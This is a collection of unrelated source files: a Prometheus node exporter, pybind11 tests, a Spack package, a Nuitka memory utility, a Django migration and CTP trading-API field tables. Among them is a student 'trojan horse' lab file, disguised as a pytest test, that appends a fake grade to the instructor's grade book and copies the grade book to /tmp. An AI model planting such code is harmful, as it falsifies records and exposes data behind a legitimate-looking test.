render a nodelist out of all nodes found
"""
all_nodes = []
for node in nodes.values():
all_nodes.append(node.nodelist())
return {
"version": "1.0.0",
"updated_at": NOW_TIMESTAMP.isoformat(),
'nodes': all_nodes,
}
def load_nodes(path):
"""
load nodes from storage file
"""
nodes = {}
with open(path, 'rb') as file:
nodes = pickle.load(file)
for node in nodes.values():
# reset old properties
node.online = False
node.index = None
node.clientcount = 0
return nodes
def save_nodes(path, nodes):
"""
save nodes to storage file
"""
with open(path, 'wb') as file:
pickle.dump(nodes, file)
def remove_old_nodes(nodes, delta):
"""
remove nodes older than a certain limit
"""
limit = NOW_TIMESTAMP - delta
old_keys = []
for key, node in nodes.items():
if node.lastseen < limit:
old_keys.append(key)
count = 0
for key in old_keys:
del nodes[key]
count += 1
print("Removed {} old nodes".format(count))
def is_file(path):
"""
    Check whether a regular file exists at the given path
"""
return path and os.path.isfile(path)
def main():
"""
main function collecting data from input file/storage and serving prometheus data
"""
import argparse
parser = argparse.ArgumentParser(
description='Convert data received from alfred and provide them as prometheus-service')
parser.add_argument('-m', '--maps', default='robin.txt', help=r'input file containing data collected by alfred')
parser.add_argument('--storage', default='nodes_backup.bin',
help=r'store old data between calls e.g. to remember node lastseen values')
parser.add_argument('-p', '--port', default=8000, help=r'the port this service should listen to')
args = parser.parse_args()
# mac => node
nodes = {}
# load old nodes that we have stored from the last call of this script,
# that way we can show nodes that are offline
if is_file(args.storage):
nodes = load_nodes(args.storage)
remove_old_nodes(nodes, datetime.timedelta(days=7))
try:
with open(args.maps, 'r') as maps:
for line in maps.readlines():
try:
AlfredParser.parse_line(line.strip(), nodes)
                except Exception:
                    # log the offending line and keep processing the rest
                    import traceback
                    print(line)
                    traceback.print_exc()
                    continue
nodes_json = render_nodelist(nodes)
except IOError:
exit('File ' + args.maps + ' not accessible')
if args.storage:
save_nodes(args.storage, nodes)
global GLOBAL_NODES
GLOBAL_NODES = nodes_json
global PORT_NUMBER
try:
PORT_NUMBER = int(args.port)
except ValueError:
exit('Error: ' + args.port + ' is not a valid port-number')
if __name__ == '__main__':
main()
REGISTRY.register(CustomCollector())
# Start up the server to expose the metrics.
start_http_server(PORT_NUMBER)
    # Periodically re-read the alfred dump so the exported metrics stay fresh.
while True:
time.sleep(10)
main()
| 30.545699 | 116 | 0.597201 | [
"MIT"
] | ffbsee/ffbsee-ansible | roles/ffbsee-robin-exporter/files/robin_prometheus.py | 11,363 | Python |
"""
Aaron Harkrider
November 8th, 2018
Build a trojan horse that gains access to a file on cyber.anderson.edu.
The file under attack is the grade book for this assignment.
Sneaky sneaky
"""
import os
def test_mytest():
"""
When Dr. Tarplee run's py.test on the assignment this py file will run and insert my entry into the grade book.
"""
# the entry I want to insert into the grade book
me = "Aaron Harkrider,19\n"
# path to the grade book file on cyber it is /home/kmtarplee2/grades.csv
# Note: to test it in pycharm use Trojan_Horse_Lab/home/kmtarplee2/grades.csv
path = "Trojan_Horse_Lab/home/kmtarplee2/grades.csv"
# Trojan_Horse_Lab / trojan_horse / home / kmtarplee2 / grades.csv
# Boolean to check if I have already inserted my entry into the file to avoid placing a duplicate
complete = True
with open(path, "r") as reading_grades:
if me not in reading_grades.read():
complete = False
# If This is not an entry for me then append my entry to the file
if not complete:
with open(path, "a+") as grades:
grades.write(me)
# piping the cat out from the grade book into a temp file where I can look at it
os.system("cat " + path + " > /tmp/awharkrider_files")
# Standard boilerplate to call the main function, if executed
if __name__ == '__main__':
test_mytest()
| 30.152174 | 115 | 0.688536 | [
"MIT"
] | awharkrider/CPSC_3320_Cybersecurity_Lab | Trojan_Horse_Lab/awharkrider_test.py | 1,387 | Python |
# SPDX-License-Identifier: Apache-2.0
# Copyright 2021 Blue Cheetah Analog Design Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
import pybind11_generics_tests.cpp as pyg_test
from pybind11_generics_tests.cpp import Animal, ListHolder, get_list
from .util import do_constructor_test, do_doc_test, do_error_test
class Dog(Animal):
def __init__(self, name):
Animal.__init__(self, name)
def go(self, n_times):
raise NotImplementedError("Not implemented")
class Husky(Dog):
def __init__(self, name):
Dog.__init__(self, name)
def go(self, n_times):
return "woof " * n_times
class ChildList(pyg_test.TestList):
def __init__(self, vec1, vec2):
pyg_test.TestList.__init__(self, vec1)
self._list2 = vec2
def get_data(self):
return self._list2
def get_data_base(self):
return pyg_test.TestList.get_data(self)
test_data = [
(pyg_test.TestList, []),
(pyg_test.TestList, [1, 3, 5, 7, 6]),
(pyg_test.TestList, [2, 4, 8]),
(pyg_test.TestList, [13]),
]
fail_data = [
(pyg_test.TestList, TypeError, [1, 2, 3.5]),
]
doc_data = [
(pyg_test.TestList, "List[int]"),
]
@pytest.mark.parametrize(("cls", "data"), test_data)
def test_constructor(cls, data):
"""Check object is constructed properly."""
do_constructor_test(cls, data)
@pytest.mark.parametrize(("cls", "err", "data"), fail_data)
def test_error(cls, err, data):
"""Check object errors when input has wrong data type."""
do_error_test(cls, err, data)
@pytest.mark.parametrize(("cls", "type_str"), doc_data)
def test_doc(cls, type_str):
"""Check object has correct doc string."""
do_doc_test(cls, type_str)
def test_inheritance():
"""Test inheritance behavior."""
vec1 = [1, 2, 3, 4]
vec2 = [5, 6, 7]
obj = ChildList(vec1, vec2)
assert obj.get_data() == vec2
assert obj.get_data_base() == vec1
assert get_list(obj) == vec1
holder = ListHolder(obj)
obj_ref = holder.get_obj_ref()
obj_ptr = holder.get_obj_ptr()
assert obj_ref is obj
assert obj_ptr is obj
assert isinstance(obj_ref, ChildList)
def test_virtual():
"""Test overriding virtual methods from python."""
prime = Animal("Prime")
dog = Dog("Doggo")
lily = Husky("Lily")
assert prime.go(1) == ""
assert lily.go(2) == "woof woof "
assert prime.command(2) == "Prime: "
assert lily.command(3) == "Lily: woof woof woof "
with pytest.raises(NotImplementedError):
dog.go(3)
with pytest.raises(NotImplementedError):
dog.command(2)
| 25.95 | 74 | 0.674374 | [
"Apache-2.0"
] | bluecheetah/pybind11_generics_tests | tests/test_list.py | 3,114 | Python |
##############################################################################
# Copyright (c) 2013-2018, Lawrence Livermore National Security, LLC.
# Produced at the Lawrence Livermore National Laboratory.
#
# This file is part of Spack.
# Created by Todd Gamblin, [email protected], All rights reserved.
# LLNL-CODE-647188
#
# For details, see https://github.com/spack/spack
# Please also see the NOTICE and LICENSE files for our notice and the LGPL.
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
class Xsetmode(AutotoolsPackage):
"""Set the mode for an X Input device."""
homepage = "http://cgit.freedesktop.org/xorg/app/xsetmode"
url = "https://www.x.org/archive/individual/app/xsetmode-1.0.0.tar.gz"
version('1.0.0', '0dc2a917138d0345c00e016ac720e085')
depends_on('libxi')
depends_on('libx11')
depends_on('pkgconfig', type='build')
depends_on('util-macros', type='build')
| 40.878049 | 79 | 0.672434 | [
"BSD-3-Clause"
] | ctuning/ck-spack | package/spack-xsetmode/package.py | 1,676 | Python |
# Copyright 2022, Kay Hayen, mailto:[email protected]
#
# Part of "Nuitka", an optimizing Python compiler that is compatible and
# integrates with CPython, but also works on its own.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
""" Tools for tracing memory usage at compiled time.
"""
from nuitka.Tracing import printLine
from .Utils import isMacOS, isWin32Windows
def getOwnProcessMemoryUsage():
"""Memory usage of own process in bytes."""
if isWin32Windows():
# adapted from http://code.activestate.com/recipes/578513
import ctypes.wintypes
# Lets allow this to match Windows API it reflects,
# pylint: disable=invalid-name
class PROCESS_MEMORY_COUNTERS_EX(ctypes.Structure):
_fields_ = [
("cb", ctypes.wintypes.DWORD),
("PageFaultCount", ctypes.wintypes.DWORD),
("PeakWorkingSetSize", ctypes.c_size_t),
("WorkingSetSize", ctypes.c_size_t),
("QuotaPeakPagedPoolUsage", ctypes.c_size_t),
("QuotaPagedPoolUsage", ctypes.c_size_t),
("QuotaPeakNonPagedPoolUsage", ctypes.c_size_t),
("QuotaNonPagedPoolUsage", ctypes.c_size_t),
("PagefileUsage", ctypes.c_size_t),
("PeakPagefileUsage", ctypes.c_size_t),
("PrivateUsage", ctypes.c_size_t),
]
GetProcessMemoryInfo = ctypes.windll.psapi.GetProcessMemoryInfo
GetProcessMemoryInfo.argtypes = [
ctypes.wintypes.HANDLE,
ctypes.POINTER(PROCESS_MEMORY_COUNTERS_EX),
ctypes.wintypes.DWORD,
]
GetProcessMemoryInfo.restype = ctypes.wintypes.BOOL
counters = PROCESS_MEMORY_COUNTERS_EX()
rv = GetProcessMemoryInfo(
ctypes.windll.kernel32.GetCurrentProcess(),
ctypes.byref(counters),
ctypes.sizeof(counters),
)
if not rv:
raise ctypes.WinError()
return counters.PrivateUsage
else:
import resource # Posix only code, pylint: disable=I0021,import-error
# The value is from "getrusage", which has OS dependent scaling, at least
# macOS and Linux are different. Others maybe too.
if isMacOS():
factor = 1
else:
factor = 1024
return resource.getrusage(resource.RUSAGE_SELF).ru_maxrss * factor
def getHumanReadableProcessMemoryUsage(value=None):
if value is None:
value = getOwnProcessMemoryUsage()
    if abs(value) < 1024 * 1024:
        return "%.2f KB (%d bytes)" % (value / 1024.0, value)
    elif abs(value) < 1024 * 1024 * 1024:
        return "%.2f MB (%d bytes)" % (value / (1024 * 1024.0), value)
    elif abs(value) < 1024 * 1024 * 1024 * 1024:
        return "%.2f GB (%d bytes)" % (value / (1024 * 1024 * 1024.0), value)
else:
return "%d bytes" % value
class MemoryWatch(object):
def __init__(self):
self.start = getOwnProcessMemoryUsage()
self.stop = None
def finish(self):
self.stop = getOwnProcessMemoryUsage()
def asStr(self):
return getHumanReadableProcessMemoryUsage(self.stop - self.start)
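# Minimal usage sketch for MemoryWatch (illustrative):
#   watch = MemoryWatch()
#   ...  # run the phase to be measured
#   watch.finish()
#   print("Memory delta:", watch.asStr())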
def startMemoryTracing():
try:
import tracemalloc
except ImportError:
pass
else:
tracemalloc.start()
def showMemoryTrace():
try:
import tracemalloc
except ImportError:
pass
else:
snapshot = tracemalloc.take_snapshot()
stats = snapshot.statistics("lineno")
printLine("Top 50 memory allocations:")
for count, stat in enumerate(stats):
if count == 50:
break
printLine(stat)
| 32.340909 | 81 | 0.625908 | [
"Apache-2.0"
] | sthagen/Nuitka-Nuitka | nuitka/utils/MemoryUsage.py | 4,269 | Python |
# -*- coding: utf-8 -*-
# Generated by Django 1.10.8 on 2018-04-30 17:09
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('codenerix_storages', '0025_auto_20180426_1035'),
]
operations = [
migrations.RemoveField(
model_name='lineoutgoingalbaran',
name='prepare_user',
),
migrations.AddField(
model_name='outgoingalbaran',
name='inventory',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.PROTECT, related_name='outgoing_albarans', to='codenerix_storages.InventoryOut', verbose_name='Inventory'),
),
migrations.AlterField(
model_name='outgoingalbaran',
name='request_stock',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='outgoing_albarans', to='codenerix_storages.RequestStock', verbose_name='Request stock'),
),
]
| 35.612903 | 206 | 0.672101 | [
"Apache-2.0"
] | centrologic/django-codenerix-storages | codenerix_storages/migrations/0026_auto_20180430_1909.py | 1,104 | Python |
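# Field-name -> primitive-type maps for the structs (CThostFtdc*Field) of the
# CTP futures trading API.  Each dict maps a struct member to a type tag
# ("string", "char", "int", "double"); such tables are typically consumed by a
# code generator or wrapper builder -- an assumption, since the original
# module carries no docstring.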
CThostFtdcDisseminationField = {
"SequenceSeries": "int",
"SequenceNo": "int",
}
CThostFtdcReqUserLoginField = {
"TradingDay": "string",
"BrokerID": "string",
"UserID": "string",
"Password": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"MacAddress": "string",
"OneTimePassword": "string",
"ClientIPAddress": "string",
"LoginRemark": "string",
"ClientIPPort": "int",
}
CThostFtdcRspUserLoginField = {
"TradingDay": "string",
"LoginTime": "string",
"BrokerID": "string",
"UserID": "string",
"SystemName": "string",
"FrontID": "int",
"SessionID": "int",
"MaxOrderRef": "string",
"SHFETime": "string",
"DCETime": "string",
"CZCETime": "string",
"FFEXTime": "string",
"INETime": "string",
}
CThostFtdcUserLogoutField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcForceUserLogoutField = {
"BrokerID": "string",
"UserID": "string",
}
CThostFtdcReqAuthenticateField = {
"BrokerID": "string",
"UserID": "string",
"UserProductInfo": "string",
"AuthCode": "string",
"AppID": "string",
}
CThostFtdcRspAuthenticateField = {
"BrokerID": "string",
"UserID": "string",
"UserProductInfo": "string",
"AppID": "string",
"AppType": "char",
}
CThostFtdcAuthenticationInfoField = {
"BrokerID": "string",
"UserID": "string",
"UserProductInfo": "string",
"AuthInfo": "string",
"IsResult": "int",
"AppID": "string",
"AppType": "char",
}
CThostFtdcRspUserLogin2Field = {
"TradingDay": "string",
"LoginTime": "string",
"BrokerID": "string",
"UserID": "string",
"SystemName": "string",
"FrontID": "int",
"SessionID": "int",
"MaxOrderRef": "string",
"SHFETime": "string",
"DCETime": "string",
"CZCETime": "string",
"FFEXTime": "string",
"INETime": "string",
"RandomString": "string",
}
CThostFtdcTransferHeaderField = {
"Version": "string",
"TradeCode": "string",
"TradeDate": "string",
"TradeTime": "string",
"TradeSerial": "string",
"FutureID": "string",
"BankID": "string",
"BankBrchID": "string",
"OperNo": "string",
"DeviceID": "string",
"RecordNum": "string",
"SessionID": "int",
"RequestID": "int",
}
CThostFtdcTransferBankToFutureReqField = {
"FutureAccount": "string",
"FuturePwdFlag": "char",
"FutureAccPwd": "string",
"TradeAmt": "double",
"CustFee": "double",
"CurrencyCode": "string",
}
CThostFtdcTransferBankToFutureRspField = {
"RetCode": "string",
"RetInfo": "string",
"FutureAccount": "string",
"TradeAmt": "double",
"CustFee": "double",
"CurrencyCode": "string",
}
CThostFtdcTransferFutureToBankReqField = {
"FutureAccount": "string",
"FuturePwdFlag": "char",
"FutureAccPwd": "string",
"TradeAmt": "double",
"CustFee": "double",
"CurrencyCode": "string",
}
CThostFtdcTransferFutureToBankRspField = {
"RetCode": "string",
"RetInfo": "string",
"FutureAccount": "string",
"TradeAmt": "double",
"CustFee": "double",
"CurrencyCode": "string",
}
CThostFtdcTransferQryBankReqField = {
"FutureAccount": "string",
"FuturePwdFlag": "char",
"FutureAccPwd": "string",
"CurrencyCode": "string",
}
CThostFtdcTransferQryBankRspField = {
"RetCode": "string",
"RetInfo": "string",
"FutureAccount": "string",
"TradeAmt": "double",
"UseAmt": "double",
"FetchAmt": "double",
"CurrencyCode": "string",
}
CThostFtdcTransferQryDetailReqField = {
"FutureAccount": "string",
}
CThostFtdcTransferQryDetailRspField = {
"TradeDate": "string",
"TradeTime": "string",
"TradeCode": "string",
"FutureSerial": "int",
"FutureID": "string",
"FutureAccount": "string",
"BankSerial": "int",
"BankID": "string",
"BankBrchID": "string",
"BankAccount": "string",
"CertCode": "string",
"CurrencyCode": "string",
"TxAmount": "double",
"Flag": "char",
}
CThostFtdcRspInfoField = {
"ErrorID": "int",
"ErrorMsg": "string",
}
CThostFtdcExchangeField = {
"ExchangeID": "string",
"ExchangeName": "string",
"ExchangeProperty": "char",
}
CThostFtdcProductField = {
"ProductID": "string",
"ProductName": "string",
"ExchangeID": "string",
"ProductClass": "char",
"VolumeMultiple": "int",
"PriceTick": "double",
"MaxMarketOrderVolume": "int",
"MinMarketOrderVolume": "int",
"MaxLimitOrderVolume": "int",
"MinLimitOrderVolume": "int",
"PositionType": "char",
"PositionDateType": "char",
"CloseDealType": "char",
"TradeCurrencyID": "string",
"MortgageFundUseRange": "char",
"ExchangeProductID": "string",
"UnderlyingMultiple": "double",
}
CThostFtdcInstrumentField = {
"InstrumentID": "string",
"ExchangeID": "string",
"InstrumentName": "string",
"ExchangeInstID": "string",
"ProductID": "string",
"ProductClass": "char",
"DeliveryYear": "int",
"DeliveryMonth": "int",
"MaxMarketOrderVolume": "int",
"MinMarketOrderVolume": "int",
"MaxLimitOrderVolume": "int",
"MinLimitOrderVolume": "int",
"VolumeMultiple": "int",
"PriceTick": "double",
"CreateDate": "string",
"OpenDate": "string",
"ExpireDate": "string",
"StartDelivDate": "string",
"EndDelivDate": "string",
"InstLifePhase": "char",
"IsTrading": "int",
"PositionType": "char",
"PositionDateType": "char",
"LongMarginRatio": "double",
"ShortMarginRatio": "double",
"MaxMarginSideAlgorithm": "char",
"UnderlyingInstrID": "string",
"StrikePrice": "double",
"OptionsType": "char",
"UnderlyingMultiple": "double",
"CombinationType": "char",
}
CThostFtdcBrokerField = {
"BrokerID": "string",
"BrokerAbbr": "string",
"BrokerName": "string",
"IsActive": "int",
}
CThostFtdcTraderField = {
"ExchangeID": "string",
"TraderID": "string",
"ParticipantID": "string",
"Password": "string",
"InstallCount": "int",
"BrokerID": "string",
}
CThostFtdcInvestorField = {
"InvestorID": "string",
"BrokerID": "string",
"InvestorGroupID": "string",
"InvestorName": "string",
"IdentifiedCardType": "char",
"IdentifiedCardNo": "string",
"IsActive": "int",
"Telephone": "string",
"Address": "string",
"OpenDate": "string",
"Mobile": "string",
"CommModelID": "string",
"MarginModelID": "string",
}
CThostFtdcTradingCodeField = {
"InvestorID": "string",
"BrokerID": "string",
"ExchangeID": "string",
"ClientID": "string",
"IsActive": "int",
"ClientIDType": "char",
"BranchID": "string",
"BizType": "char",
"InvestUnitID": "string",
}
CThostFtdcPartBrokerField = {
"BrokerID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"IsActive": "int",
}
CThostFtdcSuperUserField = {
"UserID": "string",
"UserName": "string",
"Password": "string",
"IsActive": "int",
}
CThostFtdcSuperUserFunctionField = {
"UserID": "string",
"FunctionCode": "char",
}
CThostFtdcInvestorGroupField = {
"BrokerID": "string",
"InvestorGroupID": "string",
"InvestorGroupName": "string",
}
CThostFtdcTradingAccountField = {
"BrokerID": "string",
"AccountID": "string",
"PreMortgage": "double",
"PreCredit": "double",
"PreDeposit": "double",
"PreBalance": "double",
"PreMargin": "double",
"InterestBase": "double",
"Interest": "double",
"Deposit": "double",
"Withdraw": "double",
"FrozenMargin": "double",
"FrozenCash": "double",
"FrozenCommission": "double",
"CurrMargin": "double",
"CashIn": "double",
"Commission": "double",
"CloseProfit": "double",
"PositionProfit": "double",
"Balance": "double",
"Available": "double",
"WithdrawQuota": "double",
"Reserve": "double",
"TradingDay": "string",
"SettlementID": "int",
"Credit": "double",
"Mortgage": "double",
"ExchangeMargin": "double",
"DeliveryMargin": "double",
"ExchangeDeliveryMargin": "double",
"ReserveBalance": "double",
"CurrencyID": "string",
"PreFundMortgageIn": "double",
"PreFundMortgageOut": "double",
"FundMortgageIn": "double",
"FundMortgageOut": "double",
"FundMortgageAvailable": "double",
"MortgageableFund": "double",
"SpecProductMargin": "double",
"SpecProductFrozenMargin": "double",
"SpecProductCommission": "double",
"SpecProductFrozenCommission": "double",
"SpecProductPositionProfit": "double",
"SpecProductCloseProfit": "double",
"SpecProductPositionProfitByAlg": "double",
"SpecProductExchangeMargin": "double",
"BizType": "char",
"FrozenSwap": "double",
"RemainSwap": "double",
}
CThostFtdcInvestorPositionField = {
"InstrumentID": "string",
"BrokerID": "string",
"InvestorID": "string",
"PosiDirection": "char",
"HedgeFlag": "char",
"PositionDate": "char",
"YdPosition": "int",
"Position": "int",
"LongFrozen": "int",
"ShortFrozen": "int",
"LongFrozenAmount": "double",
"ShortFrozenAmount": "double",
"OpenVolume": "int",
"CloseVolume": "int",
"OpenAmount": "double",
"CloseAmount": "double",
"PositionCost": "double",
"PreMargin": "double",
"UseMargin": "double",
"FrozenMargin": "double",
"FrozenCash": "double",
"FrozenCommission": "double",
"CashIn": "double",
"Commission": "double",
"CloseProfit": "double",
"PositionProfit": "double",
"PreSettlementPrice": "double",
"SettlementPrice": "double",
"TradingDay": "string",
"SettlementID": "int",
"OpenCost": "double",
"ExchangeMargin": "double",
"CombPosition": "int",
"CombLongFrozen": "int",
"CombShortFrozen": "int",
"CloseProfitByDate": "double",
"CloseProfitByTrade": "double",
"TodayPosition": "int",
"MarginRateByMoney": "double",
"MarginRateByVolume": "double",
"StrikeFrozen": "int",
"StrikeFrozenAmount": "double",
"AbandonFrozen": "int",
"ExchangeID": "string",
"YdStrikeFrozen": "int",
"InvestUnitID": "string",
}
CThostFtdcInstrumentMarginRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
"IsRelative": "int",
"ExchangeID": "string",
"InvestUnitID": "string",
}
CThostFtdcInstrumentCommissionRateField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"OpenRatioByMoney": "double",
"OpenRatioByVolume": "double",
"CloseRatioByMoney": "double",
"CloseRatioByVolume": "double",
"CloseTodayRatioByMoney": "double",
"CloseTodayRatioByVolume": "double",
"ExchangeID": "string",
"BizType": "char",
"InvestUnitID": "string",
}
CThostFtdcDepthMarketDataField = {
"TradingDay": "string",
"InstrumentID": "string",
"ExchangeID": "string",
"ExchangeInstID": "string",
"LastPrice": "double",
"PreSettlementPrice": "double",
"PreClosePrice": "double",
"PreOpenInterest": "double",
"OpenPrice": "double",
"HighestPrice": "double",
"LowestPrice": "double",
"Volume": "int",
"Turnover": "double",
"OpenInterest": "double",
"ClosePrice": "double",
"SettlementPrice": "double",
"UpperLimitPrice": "double",
"LowerLimitPrice": "double",
"PreDelta": "double",
"CurrDelta": "double",
"UpdateTime": "string",
"UpdateMillisec": "int",
"BidPrice1": "double",
"BidVolume1": "int",
"AskPrice1": "double",
"AskVolume1": "int",
"BidPrice2": "double",
"BidVolume2": "int",
"AskPrice2": "double",
"AskVolume2": "int",
"BidPrice3": "double",
"BidVolume3": "int",
"AskPrice3": "double",
"AskVolume3": "int",
"BidPrice4": "double",
"BidVolume4": "int",
"AskPrice4": "double",
"AskVolume4": "int",
"BidPrice5": "double",
"BidVolume5": "int",
"AskPrice5": "double",
"AskVolume5": "int",
"AveragePrice": "double",
"ActionDay": "string",
}
CThostFtdcInstrumentTradingRightField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"TradingRight": "char",
}
CThostFtdcBrokerUserField = {
"BrokerID": "string",
"UserID": "string",
"UserName": "string",
"UserType": "char",
"IsActive": "int",
"IsUsingOTP": "int",
"IsAuthForce": "int",
}
CThostFtdcBrokerUserPasswordField = {
"BrokerID": "string",
"UserID": "string",
"Password": "string",
"LastUpdateTime": "string",
"LastLoginTime": "string",
"ExpireDate": "string",
"WeakExpireDate": "string",
}
CThostFtdcBrokerUserFunctionField = {
"BrokerID": "string",
"UserID": "string",
"BrokerFunctionCode": "char",
}
CThostFtdcTraderOfferField = {
"ExchangeID": "string",
"TraderID": "string",
"ParticipantID": "string",
"Password": "string",
"InstallID": "int",
"OrderLocalID": "string",
"TraderConnectStatus": "char",
"ConnectRequestDate": "string",
"ConnectRequestTime": "string",
"LastReportDate": "string",
"LastReportTime": "string",
"ConnectDate": "string",
"ConnectTime": "string",
"StartDate": "string",
"StartTime": "string",
"TradingDay": "string",
"BrokerID": "string",
"MaxTradeID": "string",
"MaxOrderMessageReference": "string",
}
CThostFtdcSettlementInfoField = {
"TradingDay": "string",
"SettlementID": "int",
"BrokerID": "string",
"InvestorID": "string",
"SequenceNo": "int",
"Content": "string",
"AccountID": "string",
"CurrencyID": "string",
}
CThostFtdcInstrumentMarginRateAdjustField = {
"InstrumentID": "string",
"InvestorRange": "char",
"BrokerID": "string",
"InvestorID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
"IsRelative": "int",
}
CThostFtdcExchangeMarginRateField = {
"BrokerID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
"ExchangeID": "string",
}
CThostFtdcExchangeMarginRateAdjustField = {
"BrokerID": "string",
"InstrumentID": "string",
"HedgeFlag": "char",
"LongMarginRatioByMoney": "double",
"LongMarginRatioByVolume": "double",
"ShortMarginRatioByMoney": "double",
"ShortMarginRatioByVolume": "double",
"ExchLongMarginRatioByMoney": "double",
"ExchLongMarginRatioByVolume": "double",
"ExchShortMarginRatioByMoney": "double",
"ExchShortMarginRatioByVolume": "double",
"NoLongMarginRatioByMoney": "double",
"NoLongMarginRatioByVolume": "double",
"NoShortMarginRatioByMoney": "double",
"NoShortMarginRatioByVolume": "double",
}
CThostFtdcExchangeRateField = {
"BrokerID": "string",
"FromCurrencyID": "string",
"FromCurrencyUnit": "double",
"ToCurrencyID": "string",
"ExchangeRate": "double",
}
CThostFtdcSettlementRefField = {
"TradingDay": "string",
"SettlementID": "int",
}
CThostFtdcCurrentTimeField = {
"CurrDate": "string",
"CurrTime": "string",
"CurrMillisec": "int",
"ActionDay": "string",
}
CThostFtdcCommPhaseField = {
"TradingDay": "string",
"CommPhaseNo": "int",
"SystemID": "string",
}
CThostFtdcLoginInfoField = {
"FrontID": "int",
"SessionID": "int",
"BrokerID": "string",
"UserID": "string",
"LoginDate": "string",
"LoginTime": "string",
"IPAddress": "string",
"UserProductInfo": "string",
"InterfaceProductInfo": "string",
"ProtocolInfo": "string",
"SystemName": "string",
"PasswordDeprecated": "string",
"MaxOrderRef": "string",
"SHFETime": "string",
"DCETime": "string",
"CZCETime": "string",
"FFEXTime": "string",
"MacAddress": "string",
"OneTimePassword": "string",
"INETime": "string",
"IsQryControl": "int",
"LoginRemark": "string",
"Password": "string",
}
CThostFtdcLogoutAllField = {
"FrontID": "int",
"SessionID": "int",
"SystemName": "string",
}
CThostFtdcFrontStatusField = {
"FrontID": "int",
"LastReportDate": "string",
"LastReportTime": "string",
"IsActive": "int",
}
CThostFtdcUserPasswordUpdateField = {
"BrokerID": "string",
"UserID": "string",
"OldPassword": "string",
"NewPassword": "string",
}
CThostFtdcInputOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"UserForceClose": "int",
"IsSwapOrder": "int",
"ExchangeID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"ClientID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcOrderField = {
"BrokerID": "string",
"InvestorID": "string",
"InstrumentID": "string",
"OrderRef": "string",
"UserID": "string",
"OrderPriceType": "char",
"Direction": "char",
"CombOffsetFlag": "string",
"CombHedgeFlag": "string",
"LimitPrice": "double",
"VolumeTotalOriginal": "int",
"TimeCondition": "char",
"GTDDate": "string",
"VolumeCondition": "char",
"MinVolume": "int",
"ContingentCondition": "char",
"StopPrice": "double",
"ForceCloseReason": "char",
"IsAutoSuspend": "int",
"BusinessUnit": "string",
"RequestID": "int",
"OrderLocalID": "string",
"ExchangeID": "string",
"ParticipantID": "string",
"ClientID": "string",
"ExchangeInstID": "string",
"TraderID": "string",
"InstallID": "int",
"OrderSubmitStatus": "char",
"NotifySequence": "int",
"TradingDay": "string",
"SettlementID": "int",
"OrderSysID": "string",
"OrderSource": "char",
"OrderStatus": "char",
"OrderType": "char",
"VolumeTraded": "int",
"VolumeTotal": "int",
"InsertDate": "string",
"InsertTime": "string",
"ActiveTime": "string",
"SuspendTime": "string",
"UpdateTime": "string",
"CancelTime": "string",
"ActiveTraderID": "string",
"ClearingPartID": "string",
"SequenceNo": "int",
"FrontID": "int",
"SessionID": "int",
"UserProductInfo": "string",
"StatusMsg": "string",
"UserForceClose": "int",
"ActiveUserID": "string",
"BrokerOrderSeq": "int",
"RelativeOrderSysID": "string",
"ZCETotalTradedVolume": "int",
"IsSwapOrder": "int",
"BranchID": "string",
"InvestUnitID": "string",
"AccountID": "string",
"CurrencyID": "string",
"IPAddress": "string",
"MacAddress": "string",
}
CThostFtdcExchangeOrderField = {
"OrderPriceType": "char",
